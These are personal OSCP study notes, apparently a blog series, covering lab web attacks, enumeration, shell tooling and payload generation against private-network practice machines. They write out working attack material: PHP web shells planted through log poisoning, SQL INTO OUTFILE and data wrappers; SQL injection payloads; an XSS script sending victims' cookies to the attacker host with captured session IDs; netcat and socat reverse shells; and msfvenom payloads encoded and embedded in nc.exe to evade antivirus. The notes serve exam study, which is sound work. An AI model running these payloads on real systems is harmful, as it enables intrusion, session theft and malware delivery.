Study Notes - 2021/03/16|Study Notes-Penetration Testing

Use phpmyadmin to execute arbitrary sql 

1
2
select * from webappdb.users;
insert into webappdb.users(password, username) VALUES ("backdoor","backdoor");

Cross-Site Scripting (XSS)

Once we identify an entry point, we can input special characters, and observe the output to see if any of the special characters return unfiltered.

Content Injection

injsect invisible iframe <iframe src=http://192.168.119.148/report height=”0” width=”0”></iframe>
Open listern on attack machine sudo nc -nvlp 80
can redirect to information gathering script

Steal cokie and session information

Directory Traversal Vulnerabilities

Identify

find any parameter in the url that looks like a file name
e.g. http://192.168.148.10/menu.php?file=current_menu.php
modify the file to reference files that should be readable by any user on the system, such as
/etc/passwd on Linux or c:\boot.ini on Windows c:\windows\system32\drivers\etc\hosts

File inclusion Vulnerabilities

included file will be executed.

local file inclusion/remote file inclusion

different from where the file included from
We must locate
parameters we can manipulate and attempt to use them to load arbitrary files. However, a file inclusion takes this one step further, as we attempt execute the contents of the file within the application.

Contaminating Log Files

clear log
connect the servier with <?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';?>
This output is first wrapped in pre HTML tags, which preserve any line breaks or formatting in the results of the function call.
inserted into the access log of apache:
192.168.119.148 - - [16/Mar/2021:18:18:11 -0700] "<?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';?>\n" 400 980 "-" "-"

access the file inclusion url http://192.168.148.10/menu.php?file=c:\xampp\apache\logs\access.log&cmd=ipconfig

Remote file inclusion

Remote file inclusion (RFI) vulnerabilities are less common than LFIs since the server must be configured in a very specific way, but they are usually easier to exploit. For example, PHP apps must be configured with allow_url_include set to “On”.

http://192.168.148.10/menu.php?file=http://192.168.119.148/evil.txt&cmd=ipconfig
host the file by setup a apache server 

1
2
3
4
5
6
sudo vi /var/www/html/evil.txt
sudo systemctl start apache2

or 

sudo python -m SimpleHTTPServer 80

webshell

/usr/share/webshells

Expanding Your Repertoire

open a http server on current workign path

1
2
3
4
5
python -m SimpleHTTPServer 2334
python3 -m http.server 7331
php -S 0.0.0.0:8000
ruby -run -e httpd . -p 9000
busybox httpd -f -p 10000

PHP Wrappers

when cannot poison local files
menu.php?file=data:text/plain,hello world
treat the data wrapper as a file
menu.php?file=data:text/plain,<?php echo shell_exec("dir") ?>

SQL injection

Discover SQL Injection Vulnerabilities

Common statement in sql;
$query = "select * from users where username = '$user' and password = '$pass'";

Authentication Bypass

tom' or 1=1;# # is comment in mysql and mariadb
Some web application expect the number of returned rows is 1 add LIMIT 1 tom' or 1=1 LIMIT 1;#

Enumerating the database

http://192.168.148.10/debug.php?id='

Column number enueration

http://192.168.148.10/debug.php?id=1 order by 1
Use burpsuit repeater tool
results cotain 3 colums

extra further data with union statement

decide which colum is displayed
192.168.148.10/debug.php?id=1 union all select 1,2,3

Union all allow duplicate values

colum 2,3 get displayed
extract database verison: (depend on database engine, MariaDB use @@version)
http://192.168.148.10/debug.php?id=1 union all select 1, 2, @@version -> 10.1.31-MariaDB
extract current database user
http://192.168.148.10/debug.php?id=1 union all select 1, 2, user() -> root@localhost

We can enumerate database tables and column structures through the information_schema.
The information schema stores information about the database, like table and column names.
We can use it to get the layout of the database so that we can craft better payloads to extract
sensitive data. The query for this would look similar to the following:
http://192.168.148.10/debug.php?id=1 union all select 1, 2, table_name from information_schema.tables

retrieve column name of user table:
http://192.168.148.10/debug.php?id=1 union all select 1, 2, column_name from information_schema.columns where table_name='users'

extra user name and password:
http://192.168.148.10/debug.php?id=1 union all select 1, username, password from users

From sql injection to code execution

http://192.168.148.10/debug.php?id=1 union all select 1, 2, load_file('C:/Windows/System32/drivers/etc/hosts')

into outfile:
from the error message, we know the location of webserver root: c:\xampp\htdocs 

1
2
3
http://192.168.148.10/debug.php?id=1 union all select 1, 2, "<?php echo shell_exec($_GET['cmd']);?>" into OUTFILE 'c:/xampp/htdocs/backdoor2.php'

http://192.168.148.10/debug.php?id=1 union all select 1, 2, "<?php '<pre>' . shell_exec($_GET['cmd']) . '</pre>';?>" into OUTFILE 'c:/xampp/htdocs/backdoor4.php'

Automating sql injection

sqlmap – not allowed in the exam
sqlmap -u http://192.168.148.10/debug.php?id=1 -p "id"
-p parameter to test 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 6836=6836

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1 AND (SELECT 4323 FROM(SELECT COUNT(*),CONCAT(0x7171767071,(SELECT (ELT(4323=4323,1))),0x716b627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND (SELECT 1257 FROM (SELECT(SLEEP(5)))yDOk)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=1 UNION ALL SELECT NULL,CONCAT(0x7171767071,0x5a65795043747065446255675763434c564c48537750534f6d437859715570677765524e4552616a,0x716b627a71),NULL-- -

automate the data extraction
sqlmap -u http://192.168.148.10/debug.php?id=1 -p "id" --dbms=mysql --dump

mysql and mariadb looks similar

get os shell automatically:
sqlmap -u http://192.168.148.10/debug.php?id=1 -p "id" --dbms=mysql --os-shell

Study Notes - 2021/03/15|Study Notes-Penetration Testing

NFS Enumeration

port 111
nmap -sV -p 111 --script=rpcinfo 10.11.1.1-254

nmap nfs nse script

nmap -p 111 --script nfs* 10.11.1.72 

1
2
3
4
PORT    STATE SERVICE
111/tcp open  rpcbind
| nfs-showmount: 
|_  /home 10.11.0.0/255.255.0.0

mount it to our machine: 

1
2
mkdir home_72
sudo mount -o nolock 10.11.1.72:/home home_72

-o nolock disable filelocking, need for old NFS servers

1
2
3
drwxr-xr-x 2 nobody 4294967294 4096 Oct 27  2019 .
drwxr-xr-x 7 root   root       4096 Sep 17  2015 ..
-rwx------ 1 nobody 4294967294   48 Oct 27  2019 creds.txt

shows nobody instead of userid, can not create a user id as guide shown

SMTP enumeration

find existing users
port 25, udp 

1
2
nc -nv 10.11.1.217 25
VRFY idontexist

SNMP Enumeration

SNMP MIB Tree

Scan for SNMP

sudo nmap -sU --open -p 161 10.11.1.1-254 -oG open-snmp.txt
–open only display open ports
onesixtyone -c community -i ips
onesixtyone -c /usr/share/doc/onesixtyone/dict.txt 192.168.119.133

example

enumerating the entire MIB tree:
snmpwalk -c public -v1 -t 10 10.11.1.14
-v snmp version number
-t increase timeout to 10s

enumerating windows users

enumerating windows processses

open tcp ports

software

Vulnerability Scanning

scanner with nessus
open in browser: https://localhost:8834/

Vul scan with nmap

1
2
3
4
cd /usr/share/nmap/scripts/
head script.db
# can grep this file
sudo nmap --scriot vuln 10.11.1.10

Attack web application

https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project

  1. Injection
  2. Broken Authentication
  3. Sensitive Data Exposure
  4. XML External Entities (XXE)
  5. Broken Access Control
  6. Security Misconfiguration
  7. Cross-Site Scripting (XSS)
  8. Insecure Deserialization
  9. Using Components with Known Vulnerabilities
  10. Insufficient Logging & Monitoring

Web application Enumeration

  • Programming language and frameworks
  • Web server software
  • Database software
  • server OS

Inspecting URLs

php
For example, a Java-based web application might use .jsp, .do, or .html.
concept of routes, map uri to a section of code

Inspecting Page Content

Open Debugger, can pretty code content

Right click -> insepct Element

View Response headers:

  • proxy
  • firefox network tool

Server header somtimes reveal the server app and version number
Header start with X- are non-standard HTTP headers, can reveal additional info

Inspecting sitemaps

most common site maps files:
robots.txt
sitemap.xml

Locating administration consoles

Two common examples are the manager application for Tomcat and phpMyAdmin for MySQL hosted at /manager/html and /phpmyadmin respectively.

Web application assessment tools

DIRB

web content scanner, use wordlist.
dirb http://www.megacorpone.com -r -z 10
-r to scan non-recursively, and -z 10 to add a 10 millisecond delay to each request

Burp suite

foxyproxy firefox addon
add ca certificate for burpsuite
proxy->option->regenerate ca certificate
goto browser, enable proxy, open http://burp -> CA certificate to download crt file, import certificate
send to repeater, send single request

Nikto

webserver scanner - not intend to stealth itself, send info in user-agent to identify itself
-maxtime
-T which types of tests 

1
nikto -host=megacorpne.com -maxtime=30s

Exploiting

exploting admin consoles

Windows client -> XAMPP, start apache and mysql 

1
2
dirb http://10.11.0.22 -r
==> DIRECTORY: http://10.11.0.22/phpmyadmin/

Burp intruder

<input type="hidden" name="set_session" value="7r8oiuuoofdtcgc7ao731o0tcc" />
<input type="hidden" name="token" value="K&amp;$&amp;FR1\.cQ4)QW(" />

send to intruder
select positions, type: Pitchfork, allowing us to set a unique payload list for each position.

Study Notes - 2021/03/14|Study Notes-Penetration Testing

Practical Tools

Netcat

nc -nvlp 4444 -e /usr/bin/bash
nc -nv 192.168.xxx.xx 4444 -e /usr/bin/bash

Transfer file:
nc -nvlp 4444 > incoming.txt
nc -nv xxx.xxx.xxx.xxx 4444 < sendfile.txt

socat

socat - TCP4:10.11.0.22:110
sudo socat TCP4-LISTEN:443 STDOUT
sudo socat TCP4-LISTEN:443,fork file:secret.txt
socat TCP4:localhost:443 file:receive.txt,create

reverse shell

sudo socat -d -d TCP4-LISTEN:443 STDOUT
socat TCP4:localhost:443 EXEC:/bin/bash
-d -d increase verbose level two times

encrypted bind shells

create certificate:
openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 362 -out bind_shell.crt
cat bind_shell.key bind_shell.crt > bind_shell.pem
sudo socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash
socat - OPENSSL:localhost:443,verify=0

Powershell

Set-ExecutionPolicy Unrestricted

file transfer


Let me skip this

Wireshark

catpure filter:
net 10.11.1.0/24
display filter:
tcp.port == 21
rightclick package->follow tcp stream

TCPDUMP

sudo tcpdump -n -r password_cracking_filtered.pcap | awk -F" " '{print $5}' | sort | uniq -c | head

Bash Scripting

variable

1
2
var1=hello
echo $varq
1
2
var1='hell world'
var1="hello world"

for single quote: interprets every enclosed character literally
for double quote: excpet $, ```, and \ 

1
2
user=$(whoami)
user2=`whoami`

command execute in a subshell
$1, $2 …. arguments
$? The exit status of the most recently run process

Reading user input

read answer assign to answer variable
-p specify the prompt
-sp secret prompt

Conditions

1
2
3
4
5
6
7
8
9
if [ <sometest> ]
then 
    <statements>
elif [ <condition> ]
then 
    <statement>
else
    <statments>
fi
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
Operator Description: Expression True if…
!EXPRESSION The EXPRESSION is false.
-n STRING STRING length is greater than zero
-z STRING The length of STRING is zero (empty)
STRING1 != STRING2 STRING1 is not equal to STRING2
STRING1 = STRING2 STRING1 is equal to STRING2
INTEGER1 -eq INTEGER2 INTEGER1 is equal to INTEGER2
INTEGER1 -ne INTEGER2 INTEGER1 is not equal to INTEGER2
INTEGER1 -gt INTEGER2 INTEGER1 is greater than INTEGER2
INTEGER1 -lt INTEGER2 INTEGER1 is less than INTEGER2
INTEGER1 -ge INTEGER2 INTEGER1 is greater than or equal to INTEGER 2
INTEGER1 -le INTEGER2 INTEGER1 is less than or equal to INTEGER 2
-d FILE FILE exists and is a directory
-e FILE FILE exists
-r FILE FILE exists and has read permission
-s FILE FILE exists and it is not empty
-w FILE FILE exists and has write permission
-x FILE FILE exists and has execute permission

cmd && cmd2 execute cmd2 only if cmd return true/success
cmd || cmd2 execute if cmd fails 

1
2
3
4
if [ <cond1> ] && [ <cond2> ]
then
    <statement>
fi

Loops:

For loop

1
2
3
4
5
6
7
for var-name in <list>
do
    <action>
done

for ip in $(seq 1 10); do echo 10.11.1.$ip; done
for i in {1..10}; do echo 10.11.1.$i;done

While loops

1
2
3
4
while [ <some test> ]
do
    <perform an action>
done

functions

``
function function_name {
echo “$1”
}

function_name () {
commands…
}

function_name $RANDOM

1
2
3
4
5
6
7
8
9

**function must defined before get called**  
### Return
``` bash
function1() {
 return $RANDOM   
}
function1
echo "value returned is $?"

local variable

1
2
3
4
5
6
name1=hello
name2=name2
func1() {
    local name1=world
    name2=changed
}

Some practical usage

1
2
3
grep "href=" index.html | grep "\.google" | grep -v "www\.google\.com" | awk -F "http://" '{print $2}' | cut -d "/" -f 1
grep -o '[^/]*\.google\.com' index.html | sort -u > list.txt
for url in $(cat list.txt); do host $url; done | grep "has address" | cut -d " " -f 4 | sort -u

[^/]* any char except ‘/‘

Second usage:

1
2
3
searchsploit afd windows -w -t
searchsploit afd windows -w -t | grep http | cut -f 2 -d "|"

-w Show URLs to Exploit-DB.com rather than the local path 

1
2
3
for e in $(searchsploit afd windows -w -t | grep http | cut -f 2 -d "|");
do exp_name=$(echo $e | cut -d "/" -f 5) && url=$(echo $e | sed 's/exploits/raw/') &&
wget -q --no-check-certificate $url -O $exp_name; done

-q quite mode 

1
2
3
4
5
6
7
8
#!/bin/bash
# Bash script to search for a given exploit and download all matches.
for e in $(searchsploit afd windows -w -t | grep http | cut -f 2 -d "|")
do
exp_name=$(echo $e | cut -d "/" -f 5)
url=$(echo $e | sed 's/exploits/raw/')
wget -q --no-check-certificate $url -O $exp_name
done

Third usage:

1
2
3
sudo nmap -A -p80 --open 10.11.1.0/24 -oG nmap-scan_10.11.1.1-254

cat nmap-scan_10.11.1.1-254 | grep 80 | grep -v "Nmap" | awk '{print $2}'

awk use space as delimiter 

1
for ip in $(cat nmap-scan_10.11.1.1-254 | grep 80 | grep -v "Nmap" | awk '{print $2}'); do cutycapt --url=$ip --out=$ip.png;done

cutycapt render the webpage

Passive Information Gathering

Passive Information Gathering (also known as Open-source Intelligence or OSINT)

  • never communicate with the target directly

Website Recon

simply browsing the site

Whois enueration

whois google.com, can also look for ns
reverse lookup:
whois <ip>

Google Hacking

site:domanname.com filetype:php
site:domanname.com -filetyle:html
intitle:"index of" "parent directory"
https://www.exploit-db.com/google-hacking-database

netcraft

https://www.netcraft.com/
https://searchdns.netcraft.com

Recon-NG

Shodan

Security headers

https://securityheaders.com/

SSL server test

https://www.ssllabs.com/ssltest/
analyze ssl configurations

https://pastebin.com/

User information gathering

Email Harvesting

theHarvester -d hello.com -b google

https://www.social-searcher.com
https://digi.ninja/projects/twofi.php
https://github.com/initstring/linkedin2username

StackOverflow?

Some frameworks

OSINT Framework https://osintframework.com/
Maltego https://www.paterva.com/buy/maltego-clients.php

Active Information Gathering

DNS Enumeration

host www.google.ca
host -t mx www.google.ca

Forward Lookup bruteforce

Reverse lookup bruteforce

1
for ip in $(seq 50 100); do host x.x.x.$ip; done | grep -v "not found"

DNS ZONETRANSFER

host -l
dnsrecon -d domain -D ~/list -t brt

Port Scanning

nc -nvv -w 1 -z 10.11.1.220 3388-3390
-w option specifies the connection timeout in seconds and -z is used to specify zero-I/O mode
nc -nv -u -z -w 1 10.11.1.115 160-162 -u udp

Nmap

-sT connection
-sU udp scan
-sS stealth/SYN scan

network sweeping

nmap -sn 10.11.1.1-254 -sn: Ping Scan - disable port scan
nmap -p 80 10.11.1.1-254 -oG web-sweep.txt
nmap -sT -A --top-ports=20 10.11.1.1-254 -oG top-port-sweep.txt

top ports determined here: /usr/share/nmap/nmap-services

-O OS fingerprint scan
-sV determine service and version info

Nmap scripting engine (NSE)

masscan

sudo apt install masscan

SMB Enumeration

port 139, 445
nmap -v -p 139, 445 --script=smb-os-discovery 10.11.1.227
nmap -v -p 139,445 -oG smb.txt 10.11.1.1-254
sudo nbtscan -r 10.11.1.0/24

NFS Enumeration

rpc-bind 107

Study Notes - 2021/03/13|Study Notes-Penetration Testing

Some reviews:

Kali Linux

/bin/
/sbin/ system programs
/etc/ files
/tmp/ temporay file delete on boot
/usr/bin/ user binary
/usr/share application support files

Linux Commands:

1
2
3
4
5
6
man -k passwd:  key word search
└─$ man -k '^passwd$'  
passwd (1)           - change user password
passwd (1ssl)        - compute password hashes
passwd (5)           - the password file
man 5 passwd

apropos == man -k

ls -a1
-1 means one file each line
cd, mkdir, pwd
with space:
cd module\ one/
mkdir -p /hello/world/{recon, exploit, report}

Finding files in kali linux

find, locate, which

locate seach a built in database instead of harddisk, can be update manually. sudo updatedb

find can search size, type….

1
sudo find / -name sbd*

manage linux services

1
2
3
sudo systemctl start ssh
sudo ss -antlp | grep sshd
ss  is  used to dump socket statistics.

-a all
-n numerical
-t tcp
-l listening
-p display process

list all available services:

1
systemctl list-unit-files

Search/install/remove tools

sudo apt update
sudo apt upgrade <package-name>

apt-cache search pure-ftpd search if package exist, search in package description
apt show <pacage-name> show the description
apt install <package-name>
apt remove –purge completely remove the package including user configurations

sudo dpkg -i <path to the package file.deb> will not install any dependency

Commandline

Some environment variables:

$PATH, $USER, $PWD, $HOME

define EV:

1
2
export b=10.11.1.220
ping -c 2 $b

without export, only affect current bash, not inherit by spawning bash 

1
env

Bash history

1
2
3
history
!32   # replay line 32
!!    # repeat the last command

saved in ~/.bash_history
$HISTSIZE, $HISTFILESIZE
CTRL+R reverse-i-search looking for most recent matched command

Pipline and redirection

0 STDIN, 1 STDOUT, 2 STDERR

Redirect to a new file:
echo "test" > test.txt
Redirect to an existing file:
echo "test" >> test.txt
Redirect from a file:
wc -m < test.text connect the file to the STDIN of wc
Redirect STDERR
ls ./test 2>error.txt

Piping

cat error.txt | wc -m output of cat to input of wc

Text searching

ls -la /usr/bin | grep zip
-r recursive search
-i ignore case
sed:
echo "I need to try hard" | sed 's/hard/harder/'
cut:
echo "hello, world, ???" | cut -f 2 -d ","
-f field
-d delimiter
can only acce[t single char delimiter
echo "hello::there::friend" | awk -F "::" '{print $1, $3}'
-F field separator 

1
2
cat access.log | cut -d " " -f 1 | sort -u
cat access.log | cut -d " " -f 1 | sort | uniq -c | sort -urn

-n compare according to string numerical value
-r reverse the result of comparisons

Nano

Ctrl + K cut the line
Ctrl + U paste the line
Ctrl + W search in the file

Vim

dd delete current line
yy copy the current line
p to paste the clipboard content
x delete the char under the current cursor

File comparison

comm file1 file2 unique line in file1. file2, and in both file
comm -12 file1 file2 supress col1,2, only display lines in both files
diff -c/-u
vimdiff Ctrl + W + arrow switch window
[/] + c jump to prev/next change
d+o get the change in other window and put to the current one
d+p put the change in current window and put to the other one

Manage processes

background process

Ctrl + Z to suspend it, then resume it using bg

jobs shows the jobs in the current terminal
fg %[jobnum] return the job to the foreground

ps -ef
-e, –everyone show processes of all users
-f, –full show process uids, ppids

File and Command Monitoring

tail and watch
watch run command every 2 second

1
watch -n 5 w

w - Show who is logged on and what they are doing.
-n every 5 seconds

Download Files:

wget -O [dest] [url]
curl -o [dest] [url]
axwl -a -n 50 -o [dest] [url]
-n number of connections use
-a Alternate progress indicator

Bash environment

export HISTCONTROL=ignoredups

System bash /etc/bash.bashrc

OSCP Study Notes - 2021/03/12|OSCP-Study Notes-Penetration Testing

Vulnhub Box: XSS & MySQL FILE

Cross-Site Scripting

Find the IP address using netdiscover: 192.168.119.134

Test by add to box

1
<script>alert("helloxss")</script>

Create a php script:

1
2
3
<?php
$cookie = isset($_GET["test"]) ?$_GET["test"]:"";
?>

Start a php server:

1
2
3
service apache2 stop
php -S 192.168.119.132:80
# -S <addr>:<port> Run with built-in web server.

Inject javascript to comment box:

1
<script>location.href='http://192.168.119.132/index.php?test='+document.cookie;</script>

Then get a bounch of cookies:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
[Fri Mar 12 14:06:59 2021] 192.168.119.134:37106 [200]: GET /index.php?test=PHPSESSID=h576adtob2huvem6m28ndk6lm5
[Fri Mar 12 14:06:59 2021] 192.168.119.134:37106 Closing
[Fri Mar 12 14:08:00 2021] 192.168.119.134:37110 Accepted
[Fri Mar 12 14:08:00 2021] 192.168.119.134:37110 [200]: GET /index.php?test=PHPSESSID=k0u7iarj89i203m84udm5ve7r5
[Fri Mar 12 14:08:00 2021] 192.168.119.134:37110 Closing
[Fri Mar 12 14:08:59 2021] 192.168.119.134:37114 Accepted
[Fri Mar 12 14:08:59 2021] 192.168.119.134:37114 [200]: GET /index.php?test=PHPSESSID=ioephhq6n3efntimq0nb2hfv26
[Fri Mar 12 14:08:59 2021] 192.168.119.134:37114 Closing
[Fri Mar 12 14:09:59 2021] 192.168.119.134:37118 Accepted
[Fri Mar 12 14:09:59 2021] 192.168.119.134:37118 [200]: GET /index.php?test=PHPSESSID=56lch59vt5c10o40lutelou564
[Fri Mar 12 14:09:59 2021] 192.168.119.134:37118 Closing
[Fri Mar 12 14:10:59 2021] 192.168.119.134:37122 Accepted
[Fri Mar 12 14:10:59 2021] 192.168.119.134:37122 [200]: GET /index.php?test=PHPSESSID=tal24ib05acs49vaf2i39r6jh7
[Fri Mar 12 14:10:59 2021] 192.168.119.134:37122 Closing
[Fri Mar 12 14:11:59 2021] 192.168.119.134:37126 Accepted

Download Cookie_manager_plus plugin
add the cookie, refresh and open click the admin

Login as admin !!

SQL Injection

Go to the login page

Check the Sql injection cheat sheet, search Pentest lab sql injection cheat sheet
https://pentestlab.blog/2012/12/24/sql-injection-authentication-bypass-cheat-sheet/

Potential Sql injection position:

1
192.168.119.134/post.php?id=3

?id=3

Lets try sqlmap first

not allowed in the exam 

1
2
sqlmap -u "192.168.119.134/post.php?id=1"
[15:04:32] [WARNING] GET parameter 'id' does not seem to be injectable

or 

1
sqlmap -u "http://192.168.119.134/admin/edit.php?id=1" --cookie=PHPSESSID=79fi4mj2s3lq39p0fmdmnpdpd1

if know the cookie

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
sqlmap identified the following injection point(s) with a total of 59 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 7510=7510

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND (SELECT 5982 FROM (SELECT(SLEEP(5)))lOqF)

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: id=-9410 UNION ALL SELECT NULL,NULL,CONCAT(0x7171706a71,0x716c664c74636976635573484b575956527471614e56527a524b527a4a76687a4a78454267716675,0x7171787871),NULL-- -
---

Dump the databse:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
sqlmap -u "http://192.168.119.134/admin/edit.php?id=1" --cookie=PHPSESSID=79fi4mj2s3lq39p0fmdmnpdpd1 --dump
[15:24:33] [INFO] cracked password 'P4ssw0rd' for user 'admin'                                                      
Database: blog                                                                                                      
Table: users
[1 entry]
+----+-------+---------------------------------------------+
| id | login | password                                    |
+----+-------+---------------------------------------------+
| 1  | admin | 8efe310f9ab3efeae8d410a8e0166eb2 (P4ssw0rd) |
+----+-------+---------------------------------------------+

+----+---------+--------------------------------------------------------------------------------------------------+---------+---------+-----------+
| id | post_id | text                                                                                             | title   | author  | published |
+----+---------+--------------------------------------------------------------------------------------------------+---------+---------+-----------+
| 1  | 2       | <script>alert("XSS")</script>                                                                    | <blank> | <blank> | NULL      |
| 2  | 2       |         <script>location.href='http://192.168.119.132/index.php?test='+document.cookie;</script> | <blank> | <blank> | NULL      |
| 3  | 3       |         rt                                                                                       | df      | df      | NULL      |
| 4  | 3       |         <script>location.href='http://192.168.119.132/index.php?test='+document.cookie;</script> | <blank> | <blank> | NULL      |
| 5  | 1       |         <script>location.href='http://192.168.119.132/index.php?test='+document.cookie;</script> | <blank> | <blank> | NULL      |
+----+---------+--------------------------------------------------------------------------------------------------+---------+---------+-----------+

try login page:

1
sqlmap -u "http://192.168.119.134/admin/login.php" --data="user=hello&password=23c"

Local File Inclusion

Vulhunb: https://www.vulnhub.com/entry/pentester-lab-php-include-and-post-exploitation,79/

Use nikto:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
nikto -h 192.168.119.135

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.119.135
+ Target Hostname:    192.168.119.135
+ Target Port:        80
+ Start Time:         2021-03-12 20:47:51 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.2.16 (Debian)
+ Retrieved x-powered-by header: PHP/5.3.2
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.2.16 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.0.1".
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /index.php: PHP include error may indicate local or remote file inclusion is possible.
+ OSVDB-3126: /submit?setoption=q&option=allowed_ips&value=255.255.255.255: MLdonkey 2.x allows administrative interface access to be access from any IP. This is typically only found on port 4080.
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3092: /login/: This might be interesting...
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ Server may leak inodes via ETags, header found with file /icons/README, inode: 3472, size: 5108, mtime: Tue Aug 28 06:48:10 2007
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ 8725 requests: 0 error(s) and 23 item(s) reported on remote host
+ End Time:           2021-03-12 20:48:20 (GMT-5) (29 seconds)

but found

1
http://192.168.119.13(5/index.php?page=../../../../../../../../../../etc/passwd%00

not be able to scan anything,

Create a pdf file

1
2
3
4
%PDF-1.4
<?php
    system($_GET["cmd"]);
?>

the file goes to upload folder how to know that?

1
http://192.168.119.135/index.php?page=uploads/shell.pdf%00&cmd=whoami

%00 tell php ignore following content

php reverse shell

https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php

add %PDF-1.4 to make it looks like a pdf file
modify ip and port in the script 

1
nc -nvlp 4444

get the shell now
next step: privielege escalation
find a folder you have full control

Remote File Inclusion

create malicious payload

1
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.119.132 LPORT=444 >> exploit.php

Host a file

1
2
3
service apache2 stop
cd /var/www/html 
python -m SimpleHTTPServer 80

this one need to use metasploit handler to receive connection, so maybe use php-reverse-shell for exam 

1
2
3
4
use exploit/multi/handler
msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
set LHOST 192.168.119.132
set LPORT 4444

Other things:

find a good blog: My journey through OSCP

OSCP Study Notes - 2021/03/11|OSCP-Study Notes-Penetration Testing

Fuzzing

Download Vulnserver
Download immunity debugger


Skip since can not setup Vulnserver on host, not safe btw

Client Side Attack,

Need a vulnerable web browser, something like phishing

wait for victim to visit your site

setoolkit - social engineering attack

46->2 windows reverse_TCP meterpreter, errors again… guess my host is very secure

Java Applet Attacks

Reverse Shell

In a typical remote system access scenario, the user is the client and the target machine is the server. The user initiates a remote shell connection and the target system listens for such connections. With a reverse shell, the roles are opposite. It is the target machine that initiates the connection to the user, and the user’s computer listens for incoming connections on a specified port.

generate Virus

1
2
3
4
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.1 LPORT=4444 -f exe -o shell1.exe

# check options
msfvenom -p windows/shell_reverse_tcp --list-options

MsfVenom - a Metasploit standalone payload generator.
-p, –payload

Anti Virus

virustotl, scan for virus, test if it pass anti virus

add encoding

1
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.1 LPORT=4444 -f exe -o -e x86/shikata_ga_nai shell2.exe

About shikata ga nai encoder: https://www.boozallen.com/c/insight/blog/the-shikata-ga-nai-encoder.html

embeded to another binary

1
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.1 LPORT=4444 -f exe -o -e x86/shikata_ga_nai -x /usr/share/windows-binaries/nc.exe shell3.exe

-x, –template

Create virus youself will make the virustotal down

Pre-exploit password attacks

brute force attack, last resort

ncrack, medusa, hydra

wordlist:

1
gzip -d /usr/share/wordlists/rockyou.txt.gz > ...

Use Kioptrix VM

1
hydra -v -l root -P rockyou.txt 192.168.0.22 ssh

-l login user
ssh has log, will be detected

get conenction reset error

try to manually connect ssh, get 

1
Unable to negotiate with 192.168.0.22 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1

add to ~/.ssh/config

1
2
3
Host 192.168.0.22
        KexAlgorithms +diffie-hellman-group1-sha1
        Ciphers +aes128-cbc

add -c to wait for 1s between each retry
the wait time in seconds per login attempt over all threads

Metasplit brute force

1
use auxiliary/scanner/ssh/ssh_login
OSCP Study Notes - 2021/03/10|OSCP-Study Notes-Penetration Testing

TRY HARDER!!

DNS Enumeration

host command

1
2
3
4
└─# host -t ns zonetransfer.me
zonetransfer.me name server nsztm2.digi.ninja.
zonetransfer.me name server nsztm1.digi.ninja.

-t specifies the query type

1
2
3
4
5
6
7
8
└─# host -t mx zonetransfer.me                                                                                 1 ⨯
